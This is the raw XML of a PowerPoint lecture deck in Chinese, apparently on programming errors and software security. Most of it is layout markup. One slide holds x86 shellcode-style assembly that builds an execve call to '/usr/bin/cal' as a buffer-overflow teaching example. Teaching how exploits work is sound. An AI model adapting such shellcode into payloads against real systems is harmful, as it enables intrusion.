
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bin" ContentType="audio/unknown"/>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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="353" r:id="rId7"/>
    <p:sldId id="354" r:id="rId8"/>
    <p:sldId id="355" r:id="rId9"/>
    <p:sldId id="357" r:id="rId10"/>
    <p:sldId id="356" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="269" r:id="rId20"/>
    <p:sldId id="270" r:id="rId21"/>
    <p:sldId id="271" r:id="rId22"/>
    <p:sldId id="272" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="293" r:id="rId25"/>
    <p:sldId id="287" r:id="rId26"/>
    <p:sldId id="286" r:id="rId27"/>
    <p:sldId id="282" r:id="rId28"/>
    <p:sldId id="289" r:id="rId29"/>
    <p:sldId id="290" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="292" r:id="rId32"/>
    <p:sldId id="351"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529" r:id="rId9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81"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="140" d="100"/>
          <a:sy n="140"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01231-1D03-E946-B6D0-496793582F68}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18</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3ABCD8-1CD5-7245-8941-6DD6C20A5094}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1999449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aike.baidu.com/item/%E5%BE%AA%E7%8E%AF/71073"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baike.baidu.com/item/%E9%80%BB%E8%BE%91%E9%94%99%E8%AF%AF/4321331"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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07/16/96</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>##</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1367431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这个可能的问题在哪里呢？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页眉占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07/16/96</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>##</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3070522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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07/16/96</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>##</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3667132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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07/16/96</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>##</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="787315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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07/16/96</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>##</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="992499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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07/16/96</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>##</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3368302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822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="761419" indent="-292854" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1171414" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1639980" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2108547" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2577112" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3045678" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3514245" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3982810" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{423DE373-0C45-B54D-9C0C-CF96BC1A0688}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>xor %eax,%eax #set eax to zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov %eax,0xbffff9ff #set to NULL word</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xb,%al #set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> for execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffffa03,%ebx #ptr to arg 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffff9fb,%ecx #ptr to arg 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov 0xbffff9ff,%edx  #ptr to arg 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int $80 # make system call to execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>arg 2 array pointer array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char * []={0xbffff9ff, points to a NULL str</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>“1111”}; #will be changed to 0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>terminates ptr array &amp; also used for arg3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>“/usr/bin/cal\0”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96282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822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="761419" indent="-292854" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1171414" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1639980" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2108547" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
